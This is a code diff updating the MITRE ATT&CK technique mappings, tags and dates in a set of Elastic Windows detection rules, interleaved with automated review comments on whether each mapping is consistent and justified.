-[[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_mailbox.toml b/rules/windows/collection_posh_mailbox.toml index a13e4dc57b8..936b683766c 100644 --- a/rules/windows/collection_posh_mailbox.toml +++ b/rules/windows/collection_posh_mailbox.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/11" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -135,10 +135,12 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" @@ -149,30 +151,10 @@ id = "T1114.002" name = "Remote Email Collection" reference = "https://attack.mitre.org/techniques/T1114/002/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_screen_grabber.toml b/rules/windows/collection_posh_screen_grabber.toml index f97f5db210d..8c0cdb1752a 100644 --- a/rules/windows/collection_posh_screen_grabber.toml +++ b/rules/windows/collection_posh_screen_grabber.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -136,34 +136,16 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1113" name = "Screen Capture" reference = "https://attack.mitre.org/techniques/T1113/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_webcam_video_capture.toml b/rules/windows/collection_posh_webcam_video_capture.toml index f50dd0f2e8e..02a9ad1f14e 100644 --- a/rules/windows/collection_posh_webcam_video_capture.toml +++ b/rules/windows/collection_posh_webcam_video_capture.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/18" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,14 +93,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -124,34 +117,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1125" name = "Video Capture" reference = "https://attack.mitre.org/techniques/T1125/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_winrar_encryption.toml b/rules/windows/collection_winrar_encryption.toml index 076a07172bb..ef15efa4aae 100644 --- a/rules/windows/collection_winrar_encryption.toml +++ b/rules/windows/collection_winrar_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,11 +110,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -125,7 +120,6 @@ id = "T1560.001" name = "Archive via Utility" reference = "https://attack.mitre.org/techniques/T1560/001/" - [rule.threat.tactic] id = "TA0009" name = "Collection" 
diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml index d2af75605fd..b1817697a24 100644 --- a/rules/windows/command_and_control_certreq_postdata.toml +++ b/rules/windows/command_and_control_certreq_postdata.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -108,22 +108,7 @@ references = ["https://lolbas-project.github.io/lolbas/Binaries/Certreq/"] risk_score = 47 rule_id = "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Command and Control", - "Tactic: Exfiltration", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -135,38 +120,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml index 0c00e93c80e..32761193600 100644 --- a/rules/windows/command_and_control_common_webservices.toml +++ b/rules/windows/command_and_control_common_webservices.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/12" +updated_date = "2026/03/23" [transform] [[transform.investigate]] 
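Review bot: T1218 (System Binary Proxy Execution) / Defense Evasion is removed for certreq here, while the desktopimgdownldr hunk on L965 adds exactly that mapping — both rules detect a signed Windows binary being used to move data over the network, so the two hunks apply opposite criteria. If the intent is to map only what the observable proves (the transfer, not the proxy execution), remove it on L965 as well; if LOLBAS proxy execution counts, keep it here too. Stating the criterion in the PR description would let the remaining threat-section hunks in this series be checked against it.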
@@ -339,54 +339,13 @@ network where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" -[[rule.threat.technique]] -id = "T1568" -name = "Dynamic Resolution" -reference = "https://attack.mitre.org/techniques/T1568/" -[[rule.threat.technique.subtechnique]] -id = "T1568.002" -name = "Domain Generation Algorithms" -reference = "https://attack.mitre.org/techniques/T1568/002/" - -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" -[[rule.threat.technique.subtechnique]] -id = "T1090.002" -name = "External Proxy" -reference = "https://attack.mitre.org/techniques/T1090/002/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" -[[rule.threat.technique.subtechnique]] -id = "T1567.001" -name = "Exfiltration to Code Repository" -reference = "https://attack.mitre.org/techniques/T1567/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" - - - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml index 7a9bf50f8f0..0b1bd471e05 100644 --- a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml +++ b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml 
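Review bot: The entire Exfiltration `[[rule.threat]]` entry (T1567.001/.002) is removed, but no change to this rule's `tags` array is visible in the chunk; if that array still carries `"Tactic: Exfiltration"`, it becomes an orphan tag with no matching tactic entry. The clipboard (L949), mailbox (L951) and screen-grabber (L952) hunks are in the same position with respect to a possible `"Tactic: Execution"` tag. Separately, dropping T1568.002 (DGA) and T1090.002 (External Proxy) from a rule that watches connections to common web services is a substantive narrowing of declared coverage rather than a cleanup and deserves a sentence in the PR description.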
@@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,14 +92,18 @@ network where host.os.type == "windows" and network.protocol == "dns" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1573" name = "Encrypted Channel" reference = "https://attack.mitre.org/techniques/T1573/" +[[rule.threat.technique.subtechnique]] +id = "T1573.002" +name = "Asymmetric Cryptography" +reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml index a9db0f9e470..be7fdce0a18 100644 --- a/rules/windows/command_and_control_iexplore_via_com.toml +++ b/rules/windows/command_and_control_iexplore_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,14 +20,7 @@ name = "Potential Command and Control via Internet Explorer" risk_score = 47 rule_id = "acd611f3-2b93-47b3-a0a3-7723bcc46f6d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' 
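Review bot: The new `[[rule.threat.technique.subtechnique]]` block for T1573.002 is inserted directly after the parent technique's `reference` line with no blank separator, whereas this same patch adds a `+` blank line in front of every pre-existing subtechnique block (L948, L950, L951, L953); the inserts on L958 (T1071.004), L961 (T1090.001), L962 (T1021.001) and L970 (T1219.001) have the same gap. If those blank lines come from the repository's TOML normalizer, these files will churn again on the next normalization pass; run it before merging so the threat sections are emitted in one style.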
@@ -89,31 +82,59 @@ Internet Explorer can be manipulated via the Component Object Model (COM) to ini [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml index e584f93e7a1..78cfe61c520 100644 --- a/rules/windows/command_and_control_outlook_home_page.toml +++ b/rules/windows/command_and_control_outlook_home_page.toml 
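Review bot: T1071.004 (DNS) is the sub-technique added under Application Layer Protocol, but the context describes Internet Explorer being driven via COM to initiate connections, which points at HTTP(S) traffic and therefore T1071.001 (Web Protocols); confirm against the rule's `query` (outside this hunk) before keeping DNS. Likewise the new Defense Evasion entry names T1218.010 (Regsvr32) and T1218.011 (Rundll32), which is only justified if those binaries appear in the query's process or parent-process constraints. If they do, a line in the PR description pointing at that clause would spare the next reviewer the same check.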
@@ -2,7 +2,7 @@ creation_date = "2024/08/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,20 +64,7 @@ references = [ risk_score = 73 rule_id = "ac5a2759-5c34-440a-b0c4-51fe674611d6" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -93,25 +80,17 @@ registry where host.os.type == "windows" and event.action != "deletion" and regi [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.004" name = "Outlook Home Page" reference = "https://attack.mitre.org/techniques/T1137/004/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - 
diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml index 0e73d7b7ab7..faf4022a242 100644 --- a/rules/windows/command_and_control_port_forwarding_added_registry.toml +++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,20 +70,7 @@ references = [ risk_score = 47 rule_id = "3535c8bb-3bd5-40f4-ae32-b7cd589d5372" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -95,26 +82,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" +[[rule.threat.technique.subtechnique]] +id = "T1090.001" +name = "Internal Proxy" +reference = "https://attack.mitre.org/techniques/T1090/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml index 14e373d6b5f..4a2eba9d304 100644 --- a/rules/windows/command_and_control_rdp_tunnel_plink.toml +++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
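Review bot: Replacing T1572 (Protocol Tunneling) with T1090.001 (Internal Proxy) changes what this registry-change rule claims to detect: a port-forwarding entry written to the registry (presumably a PortProxy key) can serve either to proxy internal traffic or to tunnel a protocol such as RDP to an attacker-reachable port, so the old mapping was not wrong. Listing both techniques under the single Command and Control entry would preserve the existing T1572 coverage instead of silently moving it; if ATT&CK's own procedure examples are the reason for the swap, say so in the PR description. Dropping T1112 / Defense Evasion is fine, since the registry write is the observable rather than the objective.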
@@ -91,31 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.004" -name = "SSH" -reference = "https://attack.mitre.org/techniques/T1021/004/" - +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/command_and_control_remcos_rat_iocs.toml b/rules/windows/command_and_control_remcos_rat_iocs.toml index e7563a52d20..41cfecfa7e0 100644 --- a/rules/windows/command_and_control_remcos_rat_iocs.toml +++ b/rules/windows/command_and_control_remcos_rat_iocs.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system"] maturity = "production" -updated_date = "2025/08/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
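Review bot: Swapping T1021.004 (SSH) for T1021.001 (Remote Desktop Protocol) removes the technique that the observable — a plink/SSH client command line, going by the file name — actually evidences, and keeps only the protocol being carried inside the tunnel. Both are defensible under Lateral Movement, so listing both sub-techniques under the one T1021 entry preserves the SSH coverage this rule used to declare instead of trading one for the other. Confirm against the query, which is outside this hunk.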
@@ -53,19 +53,7 @@ references = [ risk_score = 73 rule_id = "d8b2f85a-cf1c-40fc-acf0-bb5d588a8ea6" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs" -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs"] timestamp_override = "event.ingested" type = "eql" @@ -91,14 +79,31 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml index 82f163f5d20..d1f4a1a5e14 100644 
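Review bot: The new Persistence entry (T1547.001, Registry Run Keys / Startup Folder) is only as accurate as the rule's `any where host.os.type == "windows" and …` query, which is cut off in this hunk; it should stay only if one of the IoC clauses matches a Run-key registry write or a Startup-folder file creation, otherwise the rule declares persistence coverage that a network- or process-only match cannot deliver. A short note in the PR description naming the clause that justifies T1547.001 would make this reviewable. The `"Tactic: Persistence"` tag added above is otherwise consistent with the new entry.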
--- a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml +++ b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.investigate]] @@ -144,20 +144,7 @@ references = ["https://labs.sentinelone.com/living-off-windows-land-a-new-native risk_score = 47 rule_id = "15c0b7a7-9c34-4869-b25b-fa6518414899" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Sysmon", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -170,14 +157,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_remote_file_copy_powershell.toml b/rules/windows/command_and_control_remote_file_copy_powershell.toml index a390d17502c..97d01d5bcb5 100644 --- a/rules/windows/command_and_control_remote_file_copy_powershell.toml +++ b/rules/windows/command_and_control_remote_file_copy_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -128,7 +128,7 @@ PowerShell is one of system administrators' main tools for automation, report ro risk_score = 47 rule_id = "33f306e8-417c-411b-965c-c2812d6d3f4d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] type = "eql" query = ''' 
@@ -161,31 +161,31 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml index 9042a919ec0..fca7770e374 100644 --- a/rules/windows/command_and_control_remote_file_copy_scripts.toml +++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -123,31 +123,26 @@ sequence by host.id, process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/command_and_control_screenconnect_childproc.toml b/rules/windows/command_and_control_screenconnect_childproc.toml index 8ae791c89f0..e23873dfce6 100644 --- a/rules/windows/command_and_control_screenconnect_childproc.toml +++ b/rules/windows/command_and_control_screenconnect_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
